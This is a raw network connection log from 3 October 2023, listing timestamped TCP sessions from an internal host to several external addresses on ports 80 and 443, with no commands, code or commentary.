Oct 3, 2023 22:35:18.160514116 CEST	443	49801	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:18.388369083 CEST	443	49801	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:18.388689995 CEST	49801	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:18.388734102 CEST	443	49801	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:18.827970028 CEST	443	49801	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:18.828130007 CEST	443	49801	172.67.150.79	192.168.2.4
Oct 3, 2023 22:35:18.828195095 CEST	49801	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:18.828602076 CEST	49801	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:35:27.925539970 CEST	49802	80	192.168.2.4	158.101.44.242
Oct 3, 2023 22:35:30.938236952 CEST	49802	80	192.168.2.4	158.101.44.242
Oct 3, 2023 22:35:35.799613953 CEST	49803	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:35:36.946353912 CEST	49802	80	192.168.2.4	158.101.44.242
Oct 3, 2023 22:35:38.804929018 CEST	49803	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:35:44.806488991 CEST	49803	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:35:48.950133085 CEST	49802	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:35:51.957227945 CEST	49802	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:35:56.813149929 CEST	49803	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:35:57.961592913 CEST	49802	80	192.168.2.4	132.226.247.73
Oct 3, 2023 22:35:59.827817917 CEST	49803	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:05.841418982 CEST	49803	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:09.964205980 CEST	49802	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:12.975066900 CEST	49802	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:16.431441069 CEST	49824	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.431459904 CEST	443	49824	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.431569099 CEST	49825	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.431575060 CEST	49824	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.431610107 CEST	443	49825	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.431638956 CEST	49826	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.431669950 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.431687117 CEST	49825	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.431723118 CEST	49826	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.432200909 CEST	49824	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.432216883 CEST	443	49824	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.432293892 CEST	49826	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.432310104 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.432343960 CEST	49825	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.432359934 CEST	443	49825	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.662827015 CEST	443	49824	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.667526007 CEST	443	49825	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.682276964 CEST	49825	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.682303905 CEST	443	49825	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.682367086 CEST	49824	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.682379961 CEST	443	49824	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.686166048 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.687279940 CEST	49826	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.687321901 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.891530991 CEST	443	49824	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.894459963 CEST	49824	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.894490004 CEST	443	49824	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.896583080 CEST	443	49825	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.896943092 CEST	49825	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.896996021 CEST	443	49825	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.918797970 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.952506065 CEST	49826	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.952564001 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.952807903 CEST	49826	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.952855110 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.953120947 CEST	49826	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.953198910 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.953346968 CEST	49826	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:16.953430891 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.953464985 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:16.954150915 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:17.331141949 CEST	443	49824	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:17.331221104 CEST	443	49824	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:17.331310987 CEST	49824	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:17.331819057 CEST	49824	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:17.334736109 CEST	49826	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:17.334954977 CEST	443	49826	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:17.335031033 CEST	49826	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:17.335458994 CEST	49825	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:17.335829973 CEST	443	49825	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:17.335911036 CEST	49825	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:17.856671095 CEST	49803	80	192.168.2.4	132.226.8.169
Oct 3, 2023 22:36:18.113255024 CEST	80	49803	132.226.8.169	192.168.2.4
Oct 3, 2023 22:36:18.115006924 CEST	49803	80	192.168.2.4	132.226.8.169
Oct 3, 2023 22:36:18.115209103 CEST	49803	80	192.168.2.4	132.226.8.169
Oct 3, 2023 22:36:18.371604919 CEST	80	49803	132.226.8.169	192.168.2.4
Oct 3, 2023 22:36:18.372566938 CEST	80	49803	132.226.8.169	192.168.2.4
Oct 3, 2023 22:36:18.417471886 CEST	49803	80	192.168.2.4	132.226.8.169
Oct 3, 2023 22:36:18.981570005 CEST	49802	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:19.076167107 CEST	80	49802	193.122.130.0	192.168.2.4
Oct 3, 2023 22:36:19.076308012 CEST	49802	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:19.076669931 CEST	49802	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:20.082612038 CEST	80	49802	193.122.130.0	192.168.2.4
Oct 3, 2023 22:36:20.082685947 CEST	49802	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:21.955626011 CEST	49832	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:21.955652952 CEST	443	49832	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:21.955707073 CEST	49832	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:21.956948996 CEST	49833	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:21.956974983 CEST	443	49833	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:21.957025051 CEST	49833	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:21.957356930 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:21.957369089 CEST	49832	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:21.957384109 CEST	443	49832	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:21.957398891 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:21.957461119 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:21.958395004 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:21.958421946 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:21.958702087 CEST	49833	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:21.958714962 CEST	443	49833	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.082824945 CEST	49802	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:22.168320894 CEST	443	49832	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.168395996 CEST	49832	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.169950962 CEST	49832	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.169956923 CEST	443	49832	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.170408010 CEST	443	49832	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.171597004 CEST	49832	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.177098036 CEST	80	49802	193.122.130.0	192.168.2.4
Oct 3, 2023 22:36:22.190632105 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.190704107 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.192007065 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.192034960 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.192455053 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.193830013 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.196374893 CEST	443	49833	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.196445942 CEST	49833	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.198287964 CEST	49833	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.198307037 CEST	443	49833	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.198693037 CEST	443	49833	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.200045109 CEST	49833	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.218449116 CEST	443	49832	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.238486052 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.246447086 CEST	443	49833	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.398422003 CEST	443	49832	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.398703098 CEST	49832	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.398718119 CEST	443	49832	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.418251038 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.418854952 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.418906927 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.419053078 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.419099092 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.419281006 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.419326067 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.419475079 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.419636011 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.419760942 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.420080900 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.421922922 CEST	443	49833	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.422096014 CEST	49833	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.422118902 CEST	443	49833	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.830876112 CEST	443	49832	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.831038952 CEST	443	49832	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.831094980 CEST	49832	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.831397057 CEST	49832	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.850969076 CEST	443	49833	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.851099968 CEST	443	49833	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:22.851151943 CEST	49833	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:22.851396084 CEST	49833	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:23.243423939 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:23.243587971 CEST	443	49834	104.21.88.34	192.168.2.4
Oct 3, 2023 22:36:23.243758917 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:23.244039059 CEST	49834	443	192.168.2.4	104.21.88.34
Oct 3, 2023 22:36:27.037920952 CEST	80	49802	193.122.130.0	192.168.2.4
Oct 3, 2023 22:36:27.082989931 CEST	49802	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:33.642160892 CEST	49853	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:33.642240047 CEST	443	49853	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:33.642333031 CEST	49853	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:33.658407927 CEST	49853	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:33.658457994 CEST	443	49853	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:33.869664907 CEST	443	49853	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:33.869779110 CEST	49853	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:33.871938944 CEST	49853	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:33.871957064 CEST	443	49853	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:33.872500896 CEST	443	49853	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:33.918590069 CEST	49853	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:33.961817980 CEST	49853	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:34.002461910 CEST	443	49853	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:34.098958015 CEST	443	49853	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:34.101408005 CEST	49853	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:34.101433039 CEST	443	49853	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:34.534450054 CEST	49802	80	192.168.2.4	193.122.130.0
Oct 3, 2023 22:36:34.541260958 CEST	443	49853	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:34.541431904 CEST	443	49853	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:34.541713953 CEST	49853	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:34.542234898 CEST	49853	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:34.546228886 CEST	49803	80	192.168.2.4	132.226.8.169
Oct 3, 2023 22:36:34.667330027 CEST	49854	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:34.667366028 CEST	443	49854	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:34.667448044 CEST	49854	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:34.667856932 CEST	49854	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:34.667870998 CEST	443	49854	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:34.803093910 CEST	80	49803	132.226.8.169	192.168.2.4
Oct 3, 2023 22:36:34.807001114 CEST	49803	80	192.168.2.4	132.226.8.169
Oct 3, 2023 22:36:34.887806892 CEST	443	49854	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:34.890286922 CEST	49854	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:34.890324116 CEST	443	49854	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:35.117269993 CEST	443	49854	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:35.121885061 CEST	49854	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:35.121913910 CEST	443	49854	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:35.558460951 CEST	443	49854	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:35.558631897 CEST	443	49854	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:35.558729887 CEST	49854	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:35.559099913 CEST	49854	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:35.693183899 CEST	49855	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:35.693265915 CEST	443	49855	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:35.693334103 CEST	49855	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:35.693679094 CEST	49855	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:35.693708897 CEST	443	49855	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:35.905555010 CEST	443	49855	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:35.912256002 CEST	49855	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:35.912273884 CEST	443	49855	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:36.137789011 CEST	443	49855	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:36.138425112 CEST	49855	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:36.138458967 CEST	443	49855	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:36.580513000 CEST	443	49855	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:36.580748081 CEST	443	49855	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:36.580805063 CEST	49855	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:36.581082106 CEST	49855	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:36.924916983 CEST	49856	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:36.925009012 CEST	443	49856	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:36.925085068 CEST	49856	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:36.925415039 CEST	49856	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:36.925436020 CEST	443	49856	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:37.132014036 CEST	443	49856	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:37.134934902 CEST	49856	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:37.134977102 CEST	443	49856	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:37.361068010 CEST	443	49856	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:37.365452051 CEST	49856	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:37.365511894 CEST	443	49856	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:37.699028969 CEST	443	49856	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:37.699127913 CEST	443	49856	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:37.699213982 CEST	49856	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:37.699577093 CEST	49856	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:46.859318018 CEST	49866	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:46.859411001 CEST	443	49866	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:46.859455109 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:46.859498978 CEST	49866	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:46.859500885 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:46.859571934 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:46.859668970 CEST	49867	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:46.859710932 CEST	443	49867	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:46.859765053 CEST	49867	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:46.859988928 CEST	49866	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:46.860024929 CEST	443	49866	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:46.860192060 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:46.860219002 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:46.860352039 CEST	49867	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:46.860372066 CEST	443	49867	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.072877884 CEST	443	49866	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.074481964 CEST	49866	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.074543953 CEST	443	49866	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.084430933 CEST	443	49867	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.085618019 CEST	49867	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.085660934 CEST	443	49867	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.093689919 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.094985008 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.095016956 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.303030968 CEST	443	49866	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.303287029 CEST	49866	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.303324938 CEST	443	49866	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.314301014 CEST	443	49867	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.314527988 CEST	49867	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.314560890 CEST	443	49867	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.320933104 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.321216106 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.321255922 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.321297884 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.321306944 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.321357012 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.321369886 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.321455956 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.321469069 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.321549892 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.321631908 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.321691990 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.321711063 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.321763039 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.321772099 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.321815014 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.321871042 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.322124958 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.739164114 CEST	443	49866	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.739259005 CEST	443	49866	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.739331007 CEST	49866	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.739643097 CEST	49866	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.743236065 CEST	49867	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.743347883 CEST	443	49867	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.743410110 CEST	49867	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.746380091 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:47.746584892 CEST	443	49868	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:47.746650934 CEST	49868	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.251744032 CEST	49877	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.251791000 CEST	443	49877	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.251861095 CEST	49877	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.251976967 CEST	49878	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.252041101 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.252070904 CEST	443	49878	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.252130985 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.252147913 CEST	49878	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.252409935 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.252782106 CEST	49878	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.252863884 CEST	443	49878	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.252932072 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.252983093 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.253021002 CEST	49877	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.253041029 CEST	443	49877	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.478029013 CEST	443	49877	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.478111029 CEST	49877	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.480731964 CEST	49877	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.480745077 CEST	443	49877	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.481137991 CEST	443	49877	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.483201027 CEST	49877	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.500783920 CEST	443	49878	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.500861883 CEST	49878	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.502665997 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.502726078 CEST	49878	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.502738953 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.502746105 CEST	443	49878	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.503144026 CEST	443	49878	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.504784107 CEST	49878	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.505984068 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.506004095 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.506391048 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.508084059 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.530448914 CEST	443	49877	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.550447941 CEST	443	49878	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.554447889 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.705200911 CEST	443	49877	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.705779076 CEST	49877	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.705815077 CEST	443	49877	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.725843906 CEST	443	49878	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.726181030 CEST	49878	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.726206064 CEST	443	49878	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.730606079 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.731272936 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.731313944 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.731403112 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.731427908 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.731472969 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.731472969 CEST	49879	443	192.168.2.4	172.67.150.79
Oct 3, 2023 22:36:58.731489897 CEST	443	49879	172.67.150.79	192.168.2.4
Oct 3, 2023 22:36:58.731501102 CEST	443	49879	172.67.150.79	192.168.2.4
